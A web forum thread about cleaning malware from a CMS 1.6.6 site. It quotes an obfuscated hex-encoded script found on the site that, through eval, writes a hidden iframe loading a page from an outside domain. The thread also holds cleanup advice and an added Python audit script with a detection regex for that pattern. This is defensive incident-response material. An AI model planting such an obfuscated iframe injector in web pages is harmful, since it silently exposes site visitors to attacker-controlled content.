A client's site is running 1.6.6.
They are having a problem with a malware warning.
Code such as below was found on the index.php page, and I can see it in the source code for the login page.
I simply removed it from index.php, but how do I get rid of it from the login (and possibly other) admin pages?
Didn't want to simply update the CMS version, in case I wasn't helping?
Any advice appreciated.
Problem code (I think..)
<__script__>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr+arr[i+1],16));eval(t);</__script>
Malware problem, help needed.
Re: Malware problem, help needed.
Not sure if you've received a reply to this yet, but the malware can be (and usually is) in more than just the index.php file, so just cleaning it from there may not resolve the problem.
Here are a few things I would do if I was in your shoes:
- Take your current site offline by placing a static page (index.html) for now
- Make a copy of the site (as it is today) and a copy of the database (full backup)
- Remove the CMS site files from the current site, so the potential hole does not continue to stay in place
- Install the copy in a separate location (test site), like a local machine
- Unpack a copy of the 1.6.6 distribution over this copy, thus overwriting CMS files that may have been corrupted
- Also review the folders and remove any that are not in the original distribution
- Look in the uploads folder for strange and unexpected files and folders, and remove them
- Now launch and test the test site - if everything looks good, move the files and database back to the live site and remove the static placeholder index.html
The problem is that the security hole that allowed the malware to take hold may still exist, since you've not fundamentally changed anything (same host, same CMS version). Ideally you would take this opportunity to upgrade to the latest version of the CMS - unfortunately in your case you may have to do a series of database schema upgrades (someone more familiar with this on the forum can give you more details).
Also you should take this opportunity to make sure there are no security loopholes in your hosting service - this has been known to happen from time to time, especially on shared hosting servers. You can start with making an inquiry with your hosting technical support.
Hope this helps.
S
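An added example, not part of the original posts and not code from the CMS project: a small audit script for the test-site copy described in the steps above. It compares the copy against a freshly unpacked distribution, lists modified and extra files, flags script files in the uploads folder, and searches for the hex-string/`fromCharCode`/`eval` pattern quoted in the first post. The directory layout in `demo()` and its inert payload are constructed for illustration.

```python
import hashlib, re, tempfile
from pathlib import Path

# Modelled on the snippet quoted in this thread: a quoted run of 80+ hex
# characters, later decoded with fromCharCode and passed to eval().
# \x22 and \x27 are the double and single quote characters.
INJECT_RE = re.compile(
    rb"[\x22\x27][0-9a-fA-F]{80,}[\x22\x27].{0,300}?fromCharCode.{0,200}?eval\s*\(", re.S)
TEXT_EXT = {".php", ".html", ".htm", ".js", ".tpl", ".inc"}
SCRIPT_EXT = {".php", ".phtml", ".js"}

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def file_map(root):
    root = Path(root)
    return {p.relative_to(root).as_posix(): p for p in root.rglob("*") if p.is_file()}

def audit(site_root, clean_root, upload_dir="uploads"):
    """Compare a site copy with a clean distribution of the same version."""
    site, clean = file_map(site_root), file_map(clean_root)
    report = {"modified": [], "extra": [], "injected": [], "upload_scripts": []}
    for rel, path in sorted(site.items()):
        ext = path.suffix.lower()
        if rel not in clean:
            report["extra"].append(rel)          # not in the distribution
        elif sha256(path) != sha256(clean[rel]):
            report["modified"].append(rel)       # differs from the original
        if ext in TEXT_EXT and INJECT_RE.search(path.read_bytes()):
            report["injected"].append(rel)       # obfuscated script found
        if rel.startswith(upload_dir + "/") and ext in SCRIPT_EXT:
            report["upload_scripts"].append(rel)  # executable file in uploads
    return report

def demo():
    """Build a constructed clean tree and a tampered copy, then audit it."""
    tmp = Path(tempfile.mkdtemp())
    clean, site = tmp / "clean", tmp / "site"
    for root in (clean, site):
        (root / "uploads").mkdir(parents=True)
        (root / "index.php").write_text("<?php echo 'home'; ?>\n")
        (root / "lib.php").write_text("<?php // library ?>\n")
    payload = ('<script>var arr="' + "41" * 60 + '";t+=String.fromCharCode('
               'parseInt(arr[i]+arr[i+1],16));eval(t);</script>')  # inert sample
    with open(site / "index.php", "a") as fh:
        fh.write(payload)
    (site / "uploads" / "x.php").write_text("<?php // unexpected ?>\n")
    return audit(site, clean)

if __name__ == "__main__":
    print(demo())
```

Site-specific files such as the configuration file, custom templates and legitimate uploads will also show up as "extra" or "modified", so each hit needs a manual look rather than automatic deletion.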
Re: Malware problem, help needed.
Hi spcherub,
Thanks for the reply. Pretty well what I was thinking of doing, so will follow the steps and see how I go. It is certainly time to upgrade their CMS version.
Thanks again for the help.